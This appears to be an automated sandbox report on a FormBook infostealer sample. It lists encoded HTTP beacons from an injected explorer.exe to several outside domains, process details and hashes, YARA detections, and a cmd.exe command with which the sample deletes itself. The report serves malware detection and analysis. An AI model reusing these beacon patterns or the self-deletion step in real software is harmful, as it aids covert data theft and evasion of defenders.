Timestamp: Jun 11, 2021 09:03:13.687930107 CEST | kBytes transferred: 4657 | Direction: OUT | Data: GET /sh2m/?i0=UiVwUNrNLQfwtohPmVYH70t5lUixURpqlrLqHTUDsyREBVD/9Tpqi3FDGPs9lJ3zNa3b&4huxZr=02MtK8MPsR3L HTTP/1.1
Host: www.ezonkorea.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Timestamp: Jun 11, 2021 09:03:13.974311113 CEST | kBytes transferred: 4659 | Direction: IN | Data: HTTP/1.1 404 Not Found
Date: Fri, 11 Jun 2021 07:03:13 GMT
Server: Apache
X-Powered-By: PHP/5.6.36
X-Frame-Options: SAMEORIGIN
Cache-Control: No-Cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Data Ascii: 1fb4<!doctype html><html lang="kr"><head><meta name="viewport" content="width=360, user-scalable=no"><meta charset="UTF-8"><meta name="format-detection" content="telephone=no" /><title> </title><script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/jQuery.serializeObject/2.0.3/jquery.serializeObject.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/json3/3.3.2/json3.min.js"></script> <script type="text/javascript"> jQuery(function($) { $form = $('.pure-form'); $form.submit(function(e) { var $this = $(this);var f = this;if (f.agree.checked == false){alert(' .');f.agree.focus();return false;}if (f.customer_name.value == ""){alert(' .');f.customer_name.focus();return false;} if (f.customer_birth.value == ""){alert('


Session ID: 6 | Source IP: 192.168.2.3 | Source Port: 49744 | Destination IP: 107.180.57.111 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp: Jun 11, 2021 09:03:19.407633066 CEST | kBytes transferred: 4684 | Direction: OUT | Data: GET /sh2m/?i0=e+6U2v/464/49Vrt/4yGVwpDKMjmMUzpCV508o5/z2Kz7+x90JHivdh29zvGxsTtrzAO&4huxZr=02MtK8MPsR3L HTTP/1.1
Host: www.dndemystified.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Timestamp: Jun 11, 2021 09:03:19.565264940 CEST | kBytes transferred: 4685 | Direction: IN | Data: HTTP/1.1 404 Not Found
Date: Fri, 11 Jun 2021 07:03:19 GMT
Server: Apache
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID: 7 | Source IP: 192.168.2.3 | Source Port: 49750 | Destination IP: 45.195.169.197 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp: Jun 11, 2021 09:03:24.978941917 CEST | kBytes transferred: 4940 | Direction: OUT | Data: GET /sh2m/?i0=uHvpiI6aXo2y2Po+6svR0qIfr0jRx6IK9412etvelJearRBAFXnPloN9l4KAKLF+tazG&4huxZr=02MtK8MPsR3L HTTP/1.1
Host: www.meganfantastic.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Timestamp: Jun 11, 2021 09:03:25.300106049 CEST | kBytes transferred: 5009 | Direction: IN | Data: HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Jun 2021 07:03:25 GMT
Content-Type: text/html
Content-Length: 479
Connection: close
ETag: "6080f05e-1df"
Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>


Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 09:01:30
Start date: 11/06/2021
Path: C:\Users\user\Desktop\KY4cmAI0jU.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\KY4cmAI0jU.exe'
Imagebase: 0x400000
File size: 224710 bytes
MD5 hash: 8C35AC8D43F7E59105902FA16114144E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.218657751.0000000002170000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.218657751.0000000002170000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.218657751.0000000002170000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

                                                                                                      General

                                                                                                      Start time:09:01:30
                                                                                                      Start date:11/06/2021
                                                                                                      Path:C:\Users\user\Desktop\KY4cmAI0jU.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Users\user\Desktop\KY4cmAI0jU.exe'
                                                                                                      Imagebase:0x400000
                                                                                                      File size:224710 bytes
                                                                                                      MD5 hash:8C35AC8D43F7E59105902FA16114144E
                                                                                                      Has elevated privileges:true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.266058058.00000000009E0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.266058058.00000000009E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.266058058.00000000009E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.266028847.00000000009B0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.266028847.00000000009B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.266028847.00000000009B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.216588771.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.216588771.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.216588771.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 09:01:35
Start date: 11/06/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline:
Imagebase: 0x7ff714890000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 09:01:53
Start date: 11/06/2021
Path: C:\Windows\SysWOW64\help.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\help.exe
Imagebase: 0xb80000
File size: 10240 bytes
MD5 hash: 09A715036F14D3632AD03B52D1DA6BFF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.479612487.0000000000AF0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.479612487.0000000000AF0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.479612487.0000000000AF0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

General

Start time: 09:01:56
Start date: 11/06/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Users\user\Desktop\KY4cmAI0jU.exe'
Imagebase: 0x380000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 09:01:57
Start date: 11/06/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6b2800000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
